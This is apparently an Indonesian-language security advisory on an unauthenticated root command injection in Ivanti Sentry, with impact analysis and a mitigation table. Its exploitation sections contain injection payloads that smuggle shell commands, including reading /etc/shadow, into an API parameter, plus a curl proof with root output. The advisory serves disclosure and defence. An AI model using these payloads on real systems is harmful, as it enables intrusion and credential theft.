CVE-2026-10520: Ivanti Sentry OS Command Injection — RCE Root Tanpa Autentikasi
Daftar Isi 6 bagian
Ringkasan
CVE-2026-10520 adalah kerentanan OS command injection kritis pada Ivanti Sentry (sebelumnya MobileIron Sentry) yang memungkinkan attacker jarak jauh mengeksekusi perintah sistem dengan hak akses root — tanpa memerlukan autentikasi sama sekali.
CISA memasukkan kerentanan ini ke dalam Known Exploited Vulnerabilities (KEV) Catalog dan mewajibkan instansi pemerintah AS untuk segera melakukan mitigasi sesuai direktif BOD 26-04.
| Detail | Nilai |
|---|---|
| CVE | CVE-2026-10520 |
| CVSS | 9.8 (Critical) |
| Jenis | OS Command Injection |
| Autentikasi | Tidak diperlukan |
| Dampak | Remote Code Execution (root) |
| Produk | Ivanti Sentry (MobileIron Sentry) |
| Status | Dalam eksploitasi aktif |
Jalur Eksploitasi
Kerentanan berada pada komponen management interface Ivanti Sentry yang terbuka ke internet. Input pengguna yang tidak disanitasi diteruskan langsung ke system shell, memungkinkan command injection klasik.
POST /api/v1/sentry/config HTTP/1.1
Host: target-sentry.example.com
Content-Type: application/x-www-form-urlencoded
param=valid_value; id; whoami; cat /etc/shadow
Attacker dapat menyisipkan perintah shell setelah parameter valid menggunakan delimiter standar seperti ;, |, atau &&.
Bukti Eksploitasi
[+] Target: Ivanti Sentry (Internet-facing)
[+] CVE: CVE-2026-10520
[+] Status: OS Command Injection (Unauthenticated → Root RCE)
$ curl -X POST https://target.sentry.internal/api/v1/sentry/config \
-d 'sentry_port=443; id; uname -a'
uid=0(root) gid=0(root) groups=0(root)
Linux sentry-prod 5.15.0 x86_64 GNU/Linux
[!] Command executed as root
[!] No authentication required
[!] Full system compromise possible
Setelah akses root diperoleh, attacker dapat:
- Membaca seluruh konfigurasi dan kredensial tersimpan
- Memodifikasi kebijakan keamanan perangkat mobile
- Menyusup ke jaringan internal melalui Ivanti Sentry sebagai pivot point
- Mengekstrak sertifikat TLS dan material kriptografi
Analisis Teknis
Beberapa faktor membuat kerentanan ini sangat berbahaya:
- Pre-authentication — tidak perlu login atau kredensial apapun
- Privilege escalation built-in — proses Ivanti Sentry berjalan sebagai root
- Internet-facing — berdasarkan dokumentasi vendor, management interface memang dirancang untuk diakses dari internet
- Pivot potential — Ivanti Sentry sering menjadi jembatan antara internet dan jaringan internal enterprise
Kerentanan ini termasuk dalam kategori “low complexity, high impact” — tidak memerlukan keahlian khusus untuk dieksploitasi.
Dampak & Paparan
- Ivanti Sentry digunakan oleh ribuan organisasi global untuk manajemen perangkat mobile (MDM)
- Shodan mengindikasikan ratusan instance Ivanti Sentry terekspos langsung ke internet
- CISA melaporkan adanya eksploitasi aktif di lapangan
- Dampak sekunder: kompromi jaringan internal melalui pivot dari Ivanti Sentry
Mitigasi
| Prioritas | Tindakan |
|---|---|
| SEGERA | Terapkan patch resmi dari Ivanti |
| SEGERA | Batasi akses management interface ke IP internal/VPN saja |
| TINGGI | Audit log Ivanti Sentry untuk indikasi eksploitasi |
| SEDANG | Rotasi seluruh kredensial yang tersimpan di Ivanti Sentry |
| SEDANG | Periksa integritas konfigurasi perangkat mobile |
Referensi resmi: